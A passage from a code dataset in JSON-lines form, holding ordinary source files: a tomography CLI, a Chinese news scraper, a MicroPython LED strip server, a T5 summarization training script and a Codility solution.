reconstructed tomography\n data to an existing Tomo workflow representations in a NeXus file.''')\ntomo_parser.set_defaults(func=run_tomo)\ntomo_parser.add_argument('-i', '--input_file',\n required=True,\n type=pathlib.Path,\n help='''Full or relative input file path containing raw and/or reduced data.''')\ntomo_parser.add_argument('-o', '--output_file',\n required=True,\n type=pathlib.Path,\n help='''Full or relative input file path containing raw and/or reduced data.''')\ntomo_parser.add_argument('-c', '--center_file',\n type=pathlib.Path,\n help='''Full or relative input file path containing the rotation axis centers info.''')\n#tomo_parser.add_argument('-f', '--force_overwrite',\n# action='store_true',\n# help='''Use this flag to overwrite any existing reduced data.''')\ntomo_parser.add_argument('-n', '--num_core',\n type=int,\n default=-1,\n help='''Specify the number of processors to use.''')\ntomo_parser.add_argument('--output_folder',\n type=pathlib.Path,\n default='.',\n help='Full or relative path to an output folder')\ntomo_parser.add_argument('-s', '--save_figs',\n choices=['yes', 'no', 'only'],\n default='no',\n help='''Specify weather to display ('yes' or 'no'), save ('yes'), or only save ('only').''')\ntomo_parser.add_argument('--reduce_data',\n dest='modes',\n const='reduce_data',\n action='append_const',\n help='''Use this flag to create and add reduced data to the input file.''')\ntomo_parser.add_argument('--find_center',\n dest='modes',\n const='find_center',\n action='append_const',\n help='''Use this flag to find and add the calibrated center axis info to the input file.''')\ntomo_parser.add_argument('--reconstruct_data',\n dest='modes',\n const='reconstruct_data',\n action='append_const',\n help='''Use this flag to create and add reconstructed data data to the input file.''')\ntomo_parser.add_argument('--combine_data',\n dest='modes',\n const='combine_data',\n action='append_const',\n help='''Use this flag to combine reconstructed data data and add to the input file.''')\n\n\nif __name__ == '__main__':\n args = parser.parse_args(sys.argv[1:])\n\n # Set log configuration\n # When logging to file, the stdout log level defaults to WARNING\n logging_format = '%(asctime)s : %(levelname)s - %(module)s : %(funcName)s - %(message)s'\n level = logging.getLevelName(args.log_level)\n if args.log is sys.stdout:\n logging.basicConfig(format=logging_format, level=level, force=True,\n handlers=[logging.StreamHandler()])\n else:\n if isinstance(args.log, str):\n logging.basicConfig(filename=f'{args.log}', filemode='w',\n format=logging_format, level=level, force=True)\n elif isinstance(args.log, io.TextIOWrapper):\n logging.basicConfig(filemode='w', format=logging_format, level=level,\n stream=args.log, force=True)\n else:\n raise ValueError(f'Invalid argument --log: {args.log}')\n stream_handler = logging.StreamHandler()\n logging.getLogger().addHandler(stream_handler)\n stream_handler.setLevel(logging.WARNING)\n stream_handler.setFormatter(logging.Formatter(logging_format))\n\n args.func(args)\n","repo_name":"CHESSComputing/Tomo","sub_path":"workflow/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":10029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19359452385","text":"# -*- coding: utf-8 -*-\nimport re\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom urllib.request import urlopen\n\nfrom bs4 import BeautifulSoup\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import Rule\nfrom news_all.spider_models import NewsRCSpider\n\n\nclass ceweeklySpider(NewsRCSpider):\n\t\"\"\"中国经济周刊\"\"\"\n\tname = 'ceweekly'\n\n\tmystart_urls = {\n\t\t'http://www.ceweekly.cn/': 560, # '首页'\n\t\t'http://www.ceweekly.cn/news/comment/': 561, # 时评\n\t\t'http://www.ceweekly.cn/company/': 562, # 公司\n\t\t'http://www.ceweekly.cn/economic/it/': 563, # 科教\n\t\t'http://www.ceweekly.cn/finance/macro/': 564, # '宏观'\n\t\t# 来自spiders_all\n\t\t# 'http://www.ceweekly.cn/company/': 687, # 首页-公司 和562 url重复 但mongo source中没删除687\n\t\t'http://www.ceweekly.cn/area/shanghai/': 688, # 区域-上海\n\t\t'http://www.ceweekly.cn/area/beijing/': 689, # 区域-北京\n\t\t'http://www.ceweekly.cn/area/guangdong/': 690, # 区域-广东\n\t\t'http://space.ceweekly.cn/chenweishan': 691, # 专栏-陈惟衫\n\t\t'http://space.ceweekly.cn/chendongdong': 692, # 专栏-陈栋栋\n\t\t'http://space.ceweekly.cn/niuwenxin': 693, # 专栏-钮文新\n\t\t'http://space.ceweekly.cn/xiewei': 694, # 专栏-谢玮\n\t\t'http://space.ceweekly.cn/zhangyan': 695, # 专栏-张燕\n\t\t'http://space.ceweekly.cn/zhouqi': 696, # 专栏-周琦\n\t}\n\t# http://www.ceweekly.cn/2019/0305/250830.shtml\n\trules = (Rule(LinkExtractor(allow=r'ceweekly.cn/%s\\d{2}/\\d+.shtml' % datetime.today().strftime('%Y/%m'),\n\t deny=('video', 'audio'),\n\t # restrict_xpaths=\"//div[@class='column mar-t-10'][2]\" 之前有的 线上最新的3.14\n\t ),\n\t callback='parse_item',\n\t follow=False),\n\t )\n\n\tdef parse_item(self, response):\n\t\txp = response.xpath\n\t\ttry:\n\t\t\tpubtime = xp('//span[@class=\"date\"]/text()')[0].extract()\n\t\t\ttitle = xp('//h1[@class=\"article-title\"]/text()')[0].extract().strip()\n\t\t\tcontent_div = xp('//div[@class=\"article-content fontSizeSmall BSHARE_POP\"]')[0]\n\t\t\torigin_name = xp(\"//span[@class='source']/text()\").extract_first('')\n\t\t\torigin_name = \"\".join(origin_name.split())\n\t\t\tcontent, media, videos, cover = self.content_clean(content_div, need_video=True, kill_xpaths=[])\n\t\texcept BaseException:\n\t\t\t# return self.produce_debugitem(response, \"xpath error\")\n\t\t\treturn self.parse_item_1(response)\n\n\t\treturn self.produce_item(\n\t\t\tresponse=response,\n\t\t\ttitle=title,\n\t\t\tpubtime=pubtime,\n\t\t\torigin_name=origin_name,\n\t\t\tcontent=content,\n\t\t\tmedia=media,\n\t\t\tvideos=videos\n\t\t)\n\n\tdef parse_item_1(self, response):\n\t\t# http://www.ceweekly.cn/2019/1106/274024.shtml\n\t\tcontent_id_pattern = re.compile(r'\\d{4}/\\d{4}/(.*?).shtml')\n\t\tcontent_id = content_id_pattern.findall(response.url)[0]\n\n\t\t# convert original url to new url (mobile devices)\n\t\t# i.e.: http://app.ceweekly.cn/?app=article&controller=article&action=show&contentid=274024\n\n\t\tnew_url = 'http://app.ceweekly.cn/?app=article&controller=article&action=show&contentid=%s' % content_id\n\n\t\ttry:\n\t\t\thtml = urlopen(new_url)\n\t\t\tbs_obj = BeautifulSoup(html.read())\n\n\t\t\ttitle_div = bs_obj.head.title.get_text().split('-')\n\t\t\ttitle = \"\".join(title_div[0].split())\n\t\t\torigin_name = \"\".join(title_div[1].split())\n\n\t\t\tpub_time = bs_obj.find(\"time\").get_text()\n\n\t\t\tcontent_div = bs_obj.find(\"div\", {\"id\": \"content-show\"})\n\t\t\tcontent, media, _, _ = self.content_clean(str(content_div))\n\n\t\texcept Exception as _:\n\t\t\treturn self.produce_debugitem(response, \"xpath error\")\n\n\t\treturn self.produce_item(\n\t\t\tresponse=response,\n\t\t\ttitle=title,\n\t\t\tpubtime=pub_time,\n\t\t\torigin_name=origin_name,\n\t\t\tcontent=content,\n\t\t\tmedia=media\n\t\t)\n","repo_name":"Pintrue/news_all","sub_path":"news_all/spiders_four/ceweekly.py","file_name":"ceweekly.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"19196538087","text":"import socket, machine, uasyncio, ure\n\nimport http_server\n\n\nloop = uasyncio.get_event_loop()\n\n\nclass LEDStripServer(http_server.HTTPServer):\n def __init__(self):\n \"\"\"Setup pins and pwm objects\"\"\"\n\n # Set up regex object to find colour hex strings\n self.colour_hex_decoder = ure.compile(\"^#[A-Fa-f0-9]+$\")\n\n super().__init__()\n\n self.red_pin = machine.Pin(4)\n self.gre_pin = machine.Pin(16)\n self.blu_pin = machine.Pin(17)\n\n self.red_pwm = machine.PWM(self.red_pin)\n self.red_pwm.duty(0)\n\n self.gre_pwm = machine.PWM(self.gre_pin)\n self.gre_pwm.duty(0)\n\n self.blu_pwm = machine.PWM(self.blu_pin)\n self.blu_pwm.duty(0)\n\n self.pwm_objects = [self.red_pwm, self.blu_pwm, self.gre_pwm]\n\n for pwm in self.pwm_objects:\n pwm.freq(1000)\n\n self.debug = True\n\n self.active_task = None\n\n async def output_hex_colour(self, colour, reader, writer, data_dict):\n rgb_vals = await self.decode_hex_colour(colour)\n\n if rgb_vals == []:\n await self.bad_request(reader, writer, data_dict)\n return\n\n mapped_vals = []\n\n for val in rgb_vals:\n mapped_val = await self.map(val, 0, 255, 0, 1023)\n mapped_vals.append(mapped_val)\n\n for mapped_val, pwm_obj in zip(mapped_vals, self.pwm_objects):\n pwm_obj.duty(mapped_val)\n\n async def post_handler(self, data_dict, reader, writer):\n \"\"\"Sets the behaviour of the LEDS.\n Looks for a mode then looks for further bits of post data to determine\n LED State.\n\n Modes:\n * switch: \n - POST data:\n - red = ON/OFF\n - gre = ON/OFF\n - blu = ON/OFF\n\n * analog:\n - POST data:\n - red = int(0, 1023)\n - gre = int(0, 1023)\n - blu = int(0, 1023)\n \"\"\"\n if not \"mode\" in data_dict:\n await self.bad_request(reader, writer, data_dict)\n return\n\n if not data_dict[\"mode\"] in [\"switch\", \"analog\", \"flash\", \"fade\"]:\n await self.bad_request(reader, writer, data_dict)\n return\n\n if self.active_task != None:\n self.active_task.cancel()\n self.active_task = None\n\n if data_dict[\"mode\"] == \"switch\":\n for led, pwm_obj in zip([\"red\", \"gre\", \"blu\"], self.pwm_objects):\n if data_dict[led] == \"ON\":\n pwm_obj.duty(1023)\n elif data_dict[led] == \"OFF\":\n pwm_obj.duty(0)\n else:\n await self.bad_request(reader, writer, data_dict)\n return\n\n if data_dict[\"mode\"] == \"analog\":\n if not data_dict[\"colour\"]:\n self.bad_request(reader, writer, data_dict)\n\n await self.output_hex_colour(data_dict[\"colour\"], reader, writer, data_dict)\n\n if data_dict[\"mode\"] == \"flash\":\n colour_list = data_dict[\"colour_list\"]\n on_time_list = data_dict[\"on_time_list\"]\n\n if len(colour_list) != len(on_time_list) or len(colour_list) < 2:\n await self.bad_request(reader, writer, data_dict)\n return\n\n self.active_task = loop.create_task(\n self.flash_task(colour_list, on_time_list, reader, writer, data_dict)\n )\n\n if data_dict[\"mode\"] == \"fade\":\n colour_list = data_dict[\"colour_list\"]\n on_time_list = data_dict[\"on_time_list\"]\n fade_time_list = data_dict[\"fade_time_list\"]\n\n if (\n not len(colour_list) == len(on_time_list) == len(fade_time_list)\n or len(colour_list) < 2\n ):\n self.bad_request(reader, writer, data_dict)\n\n self.active_task = loop.create_task(\n self.fade_task(\n colour_list, on_time_list, fade_time_list, reader, writer, data_dict\n )\n )\n\n await writer.awrite(\"HTTP/1.0 200 OK\\r\\n\")\n\n await reader.aclose()\n await writer.aclose()\n\n async def flash_task(self, colours_list, on_times_list, reader, writer, data_dict):\n try:\n while True:\n for colour, time in zip(colours_list, on_times_list):\n await self.output_hex_colour(colour, reader, writer, data_dict)\n\n await uasyncio.sleep(float(time))\n\n except uasyncio.CancelledError:\n raise\n\n async def fade_task(\n self, colour_list, on_time_list, fade_time_list, reader, writer, data_dict\n ):\n try:\n while True:\n for idx, (curr_col, on_time, fade_time) in enumerate(\n zip(colour_list, on_time_list, fade_time_list)\n ):\n\n # Get index of next colour\n next_idx = idx + 1\n if next_idx > len(colour_list) - 1:\n next_idx = 0\n\n # Set LED vals for on time\n await self.output_hex_colour(curr_col, reader, writer, data_dict)\n\n await uasyncio.sleep(float(on_time))\n\n # Set up the fade\n # Get the current colour\n curr_rgb_vals = await self.decode_hex_colour(curr_col)\n\n # Get number of 60th of a second second increments that occur\n # during the fade operation\n fade_refresh_rate = 60\n\n num_incr = round(float(fade_time) * fade_refresh_rate)\n\n next_col = colour_list[next_idx]\n next_rgb_vals = await self.decode_hex_colour(next_col)\n\n rgb_diffs = [\n next_val - curr_val\n for next_val, curr_val in zip(next_rgb_vals, curr_rgb_vals)\n ]\n\n # Run the fade\n for count in range(num_incr):\n\n # Calculate this count's LED values\n fade_vals = [\n curr_rgb_val + (rgb_diff * count / num_incr)\n for rgb_diff, curr_rgb_val in zip(rgb_diffs, curr_rgb_vals)\n ]\n\n # Apply these LED values to the strip\n mapped_fade_vals = []\n\n for fade_val in fade_vals:\n mapped_val = round(\n await self.map(fade_val, 0, 255, 0, 1023)\n )\n mapped_fade_vals.append(mapped_val)\n\n for val, pwm_obj in zip(mapped_fade_vals, self.pwm_objects):\n pwm_obj.duty(val)\n\n # Wait for the next increment\n await uasyncio.sleep(1 / fade_refresh_rate)\n\n except uasyncio.CancelledError:\n raise\n\n async def decode_hex_colour(self, hex_str):\n \"\"\"Get three ints corresponding to the r, g and b values encoded in a standard\n colour hex: #RRGGBB\n \n :param hex_str: the hex string to decode.\n :type hex_str: str\n\n :return: A list of ints [r, g, b] if correct format. An empty list if incorrect\n format.\n :rtype: List[]\n \"\"\"\n\n try:\n match = self.colour_hex_decoder.match(hex_str)\n if not len(match.group(0)) == len(hex_str) == 7:\n return []\n\n except:\n return []\n\n # The hex string is the correct format, time to decode\n red = int(hex_str[1:3], 16)\n gre = int(hex_str[3:5], 16)\n blu = int(hex_str[5:7], 16)\n\n return [red, gre, blu]\n\n async def map(self, x, in_min, in_max, out_min, out_max):\n return (x - in_min) * (out_max - out_min) // (in_max - in_min) + out_min\n\n async def bad_request(self, reader, writer, data_dict):\n\n await writer.awrite(\"HTTP/1.0 400 BAD REQUEST\\r\\n\")\n\n await reader.aclose()\n await writer.aclose()\n\n await self.post_req_debug_out(data_dict)\n\n\nasync def heartbeat():\n \"\"\"Flash the onboard LED in a heartbeat to show the event loop is running\"\"\"\n\n from machine import Pin\n\n status_led = Pin(2, Pin.OUT)\n\n status_led.on()\n await uasyncio.sleep(0.1)\n status_led.off()\n await uasyncio.sleep(0.1)\n\n status_led.on()\n await uasyncio.sleep(0.1)\n status_led.off()\n await uasyncio.sleep(0.1)\n\n while True:\n status_led.on()\n await uasyncio.sleep(0.5)\n status_led.off()\n await uasyncio.sleep(0.5)\n\n\ndef main():\n led_strip_server = LEDStripServer()\n\n # Set up event loop\n loop.create_task(led_strip_server.start_server())\n loop.create_task(heartbeat())\n loop.run_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"palexander23/rgb-led-strip","sub_path":"uPythonCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28884785422","text":"import os\nimport shutil\n\nimport torch\nimport torch.nn as nn\nfrom torch.cuda.amp import GradScaler, autocast\nfrom torch.optim import AdamW\nfrom torch.optim.lr_scheduler import (\n LinearLR,\n CosineAnnealingLR,\n)\nfrom torch.nn.utils import clip_grad_norm_\nfrom rouge import Rouge\nfrom sacrebleu.metrics import BLEU\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nfrom tqdm import tqdm\nimport math\nimport numpy as np\nimport logging\n\nfrom .data_process import MyDataset\nfrom .utils import get_writer, get_logger\n\nlogger = get_logger('log.txt')\n\nrouge = Rouge()\nbleu = BLEU()\nclass T5ForFewshotGeneration(nn.Module):\n def __init__(self, args):\n super(T5ForFewshotGeneration, self).__init__()\n self.args = args\n self.tkn = T5Tokenizer.from_pretrained(args.model_name_or_path, max_model_length=args.max_source_length)\n self.model = T5ForConditionalGeneration.from_pretrained(args.model_name_or_path).cuda()\n\n def forward(self, input_ids, attention_mask): \n return self.model(\n input_ids=input_ids,\n attention_mask=attention_mask\n )\n\n def finetune(self, train_dataset=None, dev_dataset=None, pretrain=True, save_measure=None):\n args = self.args\n writer = get_writer(args.logdir)\n model = self.model\n tkn = self.tkn\n \n summarize_prefix = self.tkn.encode('summarize:', return_tensors='pt', add_special_tokens=False).cuda()\n expand_prefix = self.tkn.encode('expand:', return_tensors='pt', add_special_tokens=False).cuda()\n\n num_update_steps_per_epoch = math.ceil(\n len(train_dataset) / args.gradient_accumulation_steps\n )\n if args.max_train_steps > 0:\n args.num_train_epochs = math.ceil(\n args.max_train_steps / num_update_steps_per_epoch\n )\n else:\n args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch\n\n total_batch_size = args.train_batch_size * args.gradient_accumulation_steps\n\n optimizer = AdamW(\n params=self.parameters(),\n lr=args.learning_rate,\n betas=(0.9, 0.999),\n eps=args.adam_epsilon,\n weight_decay=args.weight_decay,\n amsgrad=False,\n )\n if args.scheduler_type == 'cosine':\n scheduler = CosineAnnealingLR(optimizer, T_max=args.max_train_steps)\n elif args.scheduler_type == 'linear':\n scheduler = LinearLR(optimizer, start_factor=1., end_factor=0.)\n else:\n raise ValueError(\"scheduler_type must be cosine or linear\")\n\n global_steps = 0\n if args.ckp_path is not None:\n self._load(args.ckp_path, optimizer, scheduler)\n pretrain = False\n global_steps = args.init_step\n\n if args.use_amp:\n scaler = GradScaler(init_scale=args.scale_loss)\n \n gen_kwargs_a2b = {\n \"max_length\": args.max_target_length,\n \"length_penalty\": 1.0,\n \"early_stopping\": True,\n }\n gen_kwargs_b2a = {\n \"max_length\": args.max_source_length,\n \"length_penalty\": 0.0,\n \"early_stopping\": True,\n }\n\n self.log(\"********** Running training **********\")\n self.log(f\" Num examples = {len(train_dataset.data)}\")\n self.log(f\" Num Epochs = {args.num_train_epochs}\")\n self.log(f\" Instantaneous train batch size = {args.train_batch_size}\")\n self.log(f\" Instantaneous eval batch size = {args.eval_batch_size}\")\n self.log(f\" Total train batch size (w. accumulation) = {total_batch_size}\")\n self.log(f\" Gradient Accumulation steps = {args.gradient_accumulation_steps}\")\n self.log(f\" Total optimization steps = {args.max_train_steps}\")\n \n self.gold_batches = train_dataset.get_batches(args.pretrain_steps)\n train_dataset.shuffle(seed=args.seed)\n # temperature = 1.0\n if pretrain:\n self.log(\"********** Pretraining **********\")\n self.train()\n for step, batch in enumerate(self.gold_batches):\n with autocast(args.use_amp):\n source_ids, source_mask, source_label, target_ids, target_mask, target_label = batch\n inputs = self.prefixed_samples(expand_prefix, source_ids, source_mask, source_label)\n loss_idt_a = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, target_ids, target_mask, target_label)\n loss_idt_b = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, target_label)\n loss_gold_b = model(**inputs)[0]\n inputs = self.prefixed_samples(expand_prefix, target_ids, target_mask, source_label)\n loss_gold_a = model(**inputs)[0]\n\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, None)\n fake_tgt_ids = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs_a2b,\n )\n inputs = self.prefixed_samples(expand_prefix, target_ids, target_mask, None)\n fake_src_ids = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs_b2a,\n )\n inputs = self.prefixed_samples(expand_prefix, fake_tgt_ids, self.gen_mask(fake_tgt_ids), source_label)\n loss_cyc_a = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, fake_src_ids, self.gen_mask(fake_src_ids), target_label)\n loss_cyc_b = model(**inputs)[0]\n\n loss_gold = loss_gold_a + loss_gold_b\n loss_total = (loss_idt_a + loss_idt_b) * args.lambda_idt + (loss_cyc_a + loss_cyc_b) * args.lambda_cyc\n loss = loss_gold + loss_total\n loss /= args.gradient_accumulation_steps\n\n if args.use_amp:\n scaler.scale(loss).backward()\n else:\n loss.backward()\n \n if (\n (step+1) % args.gradient_accumulation_steps == 0\n or step == len(train_dataset) - 1\n ):\n clip_grad_norm_(self.parameters(), args.max_grad_norm)\n if args.use_amp:\n scaler.step(optimizer)\n scaler.update()\n else:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n losses = {\n 'total': loss_total.item(),\n 'gold_a': loss_gold_a.item(),\n 'gold_b': loss_gold_b.item(),\n 'idt_a': loss_idt_a.item(),\n 'idt_b': loss_idt_b.item(),\n 'cyc_a': loss_cyc_a.item(),\n 'cyc_b': loss_cyc_b.item(),\n }\n for k, v in losses.items():\n writer.add_scalar(f\"pretrain/{k}\", v, step//args.gradient_accumulation_steps)\n \n output_dir = os.path.join(args.output_dir, \"pretrain\")\n os.makedirs(output_dir, exist_ok=True)\n self._save(output_dir, optimizer, scheduler)\n self.log(\"********** Pretraining finished**********\")\n\n progress_bar = tqdm(range(args.max_train_steps))\n\n gold_idx = 0\n last_step = global_steps\n progress_bar.update(last_step)\n found_last = last_step == 0\n \n best_score = 0.\n saves = []\n for _ in range(args.num_train_epochs):\n for step, batch in enumerate(train_dataset):\n if not found_last:\n if step / args.gradient_accumulation_steps < last_step:\n continue\n else:\n found_last = True\n self.train()\n\n with autocast(args.use_amp):\n source_ids, source_mask, source_label, target_ids, target_mask, target_label = batch\n inputs = self.prefixed_samples(expand_prefix, source_ids, source_mask, source_label)\n loss_idt_a = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, target_ids, target_mask, target_label)\n loss_idt_b = model(**inputs)[0]\n\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, None)\n fake_tgt_ids = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs_a2b,\n )\n inputs = self.prefixed_samples(expand_prefix, target_ids, target_mask, None)\n fake_src_ids = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs_b2a,\n )\n inputs = self.prefixed_samples(expand_prefix, fake_tgt_ids, self.gen_mask(fake_tgt_ids), source_label)\n loss_cyc_a = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, fake_src_ids, self.gen_mask(fake_src_ids), target_label)\n loss_cyc_b = model(**inputs)[0]\n\n loss_total = (loss_idt_a + loss_idt_b) * args.lambda_idt + (loss_cyc_a + loss_cyc_b) * args.lambda_cyc\n loss = loss_total\n\n if (global_steps+1) % args.gold_steps == 0:\n source_ids, source_mask, source_label, target_ids, target_mask, target_label = self.gold_batches[gold_idx]\n gold_idx = (gold_idx + 1) % len(self.gold_batches)\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, target_label)\n loss_gold_b = model(**inputs)[0]\n inputs = self.prefixed_samples(expand_prefix, target_ids, target_mask, source_label)\n loss_gold_a = model(**inputs)[0]\n loss_gold = loss_gold_a + loss_gold_b\n loss += loss_gold\n loss /= args.gradient_accumulation_steps\n\n if args.use_amp:\n scaler.scale(loss).backward()\n else:\n loss.backward()\n\n if (\n (step+1) % args.gradient_accumulation_steps == 0\n or step == len(train_dataset) - 1\n ):\n if args.use_amp:\n scaler.step(optimizer)\n scaler.update()\n else:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n\n progress_bar.update(1)\n global_steps += 1\n writer.add_scalar(\"train/total\", loss_total.item(), global_steps)\n writer.add_scalar(\"train/idt_a\", loss_idt_a.item(), global_steps)\n writer.add_scalar(\"train/idt_b\", loss_idt_b.item(), global_steps)\n writer.add_scalar(\"train/cyc_a\", loss_cyc_a.item(), global_steps)\n writer.add_scalar(\"train/cyc_b\", loss_cyc_b.item(), global_steps)\n \n if global_steps % args.gold_steps == 0:\n writer.add_scalar(\"train/gold_a\", loss_gold_a.item(), global_steps)\n writer.add_scalar(\"train/gold_b\", loss_gold_b.item(), global_steps)\n \n if args.logging_steps > 0 and global_steps% args.logging_steps == 0 :\n writer.add_scalar(\"lr\", optimizer.param_groups[0]['lr'], global_steps)\n writer.add_scalar(\"loss\", loss.item(), global_steps)\n self.log(\n \"global_steps {} - lr: {:.10f} loss: {:.8f}\".format(\n global_steps,\n optimizer.param_groups[0]['lr'],\n loss.item(),\n )\n )\n\n if args.save_steps > 0 and global_steps % args.save_steps == 0:\n self.log(\"********** Running evaluating **********\")\n self.log(f\"********** Step {global_steps} **********\")\n output_dir = os.path.join(args.output_dir, f\"step-{global_steps}\")\n os.makedirs(output_dir, exist_ok=True)\n self._save(output_dir, optimizer, scheduler)\n saves.append(output_dir)\n if len(saves) > args.num_saves_kept:\n shutil.rmtree(saves.pop(0))\n \n eval_results = self.evaluate(dev_dataset, args.num_eval_batch)\n scores = list(eval_results.values())\n if save_measure is None:\n score = np.mean(scores)\n else:\n measures = []\n for i in save_measure:\n measures.append(scores[i])\n score = np.mean(measures)\n \n self.debug(eval_results)\n self._save_metric(output_dir, eval_results)\n \n if score > best_score:\n self.log(f\"********** Saving best result in step {global_steps} **********\")\n best_score = score\n best_dir = os.path.join(args.output_dir, \"best\")\n os.makedirs(best_dir, exist_ok=True)\n self._save(best_dir, optimizer, scheduler)\n self._save_metric(best_dir, eval_results)\n \n for k, v in eval_results.items():\n writer.add_scalar(f\"eval/{k}\", v, global_steps)\n self.log(\"********** Evaluating Done **********\")\n\n if global_steps >= args.max_train_steps:\n self.log(\"********** Running evaluating **********\")\n self.log(f\"********** Step {global_steps} **********\")\n output_dir = os.path.join(args.output_dir, f\"final-step-{global_steps}\")\n os.makedirs(output_dir, exist_ok=True)\n self._save(output_dir, optimizer, scheduler)\n eval_results = self.evaluate(dev_dataset, -1)\n self.debug(eval_results)\n self._save_metric(output_dir, eval_results)\n for k, v in eval_results.items():\n writer.add_scalar(f\"eval/{k}\", v, global_steps)\n self.log(\"********** Evaluating Done **********\")\n self.log(\"********** Training Done **********\")\n return\n\n\n @torch.no_grad()\n def evaluate(self, data_loader=None, num_batch=100, split='validation'):\n if data_loader is None:\n data_loader = MyDataset(self.tkn, self.args.eval_batch_size, split=split)\n \n summarize_prefix = self.tkn.encode('summarize:', return_tensors='pt', add_special_tokens=False).cuda()\n self.eval()\n model = self.model\n tkn = self.tkn\n\n gen_kwargs = {\n \"max_length\": self.args.max_target_length,\n \"num_beams\": self.args.num_beams,\n \"length_penalty\": 1.0,\n \"early_stopping\": True,\n }\n decoded_preds = []\n decoded_labels = [] \n progress_bar = tqdm(range(num_batch if num_batch > 0 else len(data_loader)))\n for i, batch in enumerate(data_loader):\n if num_batch > 0 and i >= num_batch:\n break\n source_ids, source_mask, _, target_ids, _, target_label = batch\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, None)\n generated_tokens = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs,\n )\n labels = np.where(target_label.cpu().numpy() != -100, target_label.cpu().numpy(), tkn.pad_token_id)\n\n decoded_preds.extend(tkn.batch_decode(generated_tokens.cpu().numpy(), skip_special_tokens=True))\n decoded_labels.extend(tkn.batch_decode(labels, skip_special_tokens=True))\n progress_bar.update(1)\n\n self.debug(decoded_preds[:3])\n self.debug(decoded_labels[:3])\n if self.args.is_zh:\n f = lambda s: ' '.join(s)\n decoded_preds = list(map(f, decoded_preds))\n decoded_labels = list(map(f, decoded_labels))\n\n scores = rouge.get_scores(decoded_preds, decoded_labels, avg=True)\n for k in scores.keys():\n scores[k] = scores[k]['f'] * 100\n scores['bleu'] = bleu.corpus_score(decoded_preds, [decoded_labels]).score\n # return decoded_preds, decoded_labels\n return scores\n \n @torch.no_grad()\n def gen_mask(self, ids):\n mask = torch.zeros_like(ids, dtype=torch.int64)\n for i in range(ids.shape[0]):\n for j in range(ids.shape[1]):\n if ids[i,j] == self.tkn.pad_token_id:\n break\n mask[i,j] = 1\n return mask\n\n @torch.no_grad()\n def prefixed_samples(self, prefix, ids, mask, labels):\n outputs = {\n 'input_ids': torch.cat(\n [\n prefix.repeat(ids.shape[0], 1), \n ids\n ],\n dim=-1\n ).cuda(),\n 'attention_mask': torch.cat(\n [\n torch.ones(ids.shape[0], prefix.shape[-1]).cuda(), \n mask\n ],\n dim=-1\n ).cuda(),\n 'labels': labels.cuda() if labels is not None else labels\n }\n return outputs\n\n def _save(self, output_dir, optimizer, scheduler):\n state = {\n 'model': self.state_dict(), \n 'optimizer': optimizer.state_dict(), \n 'scheduler': scheduler.state_dict()\n }\n torch.save(state, os.path.join(output_dir, \"model.pth\"))\n return\n \n def _load(self, ckp_dir, optimizer, scheduler):\n state = torch.load(os.path.join(ckp_dir, \"model.pth\"))\n self.load_state_dict(state['model'])\n optimizer.load_state_dict(state['optimizer'])\n scheduler.load_state_dict(state['scheduler'])\n return\n \n def _save_metric(self, output_dir, eval_results):\n with open(os.path.join(output_dir, \"metrics.txt\"), 'w') as f:\n f.write(str(eval_results))\n return\n \n def debug(self, var):\n print(var)\n logger.debug(var)\n\n def log(self, info):\n print(info)\n logger.info(info)","repo_name":"StarsMoon/ATS","sub_path":"pytorch/model_v2.py","file_name":"model_v2.py","file_ext":"py","file_size_in_byte":19639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75190282724","text":"# MissingInteger\n# ?e, bior?c pod uwag? tablic? A z liczb ca?kowitych N, zwraca najmniejsz? dodatni? liczb? ca?kowit? (wi?ksz? ni? 0), kt�ra nie wyst?puje w A.\n# Na przyk?ad, bior?c pod uwag? A = [1, 3, 6, 4, 1, 2], funkcja powinna powr�ci? 5.\n# Bior?c pod uwag? A = [1, 2, 3], funkcja powinna wr�ci? 4.\n# Bior?c pod uwag? A = [-1, -3], funkcja powinna zwr�ci? 1.\n\ndef solution(A):\n aLen = len(A)\n B = [0] * (aLen + 2)\n bLen = len(B)\n for i in range(aLen):\n if A[i] > 0 and A[i] < bLen and B[A[i]] == 0:\n B[A[i]] = A[i]\n for i in range(1, bLen):\n if B[i] == 0:\n return i\n return 1\n \n\n#A = [1, 2, 3]\n#A = [-1, -3]\nA = [1,1,2,3,4,5,99]\nprint(solution(A))","repo_name":"dawidbo/algorithms","sub_path":"Codility/missingInteger.py","file_name":"missingInteger.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31173919022","text":"from typarse import BaseParser\nimport 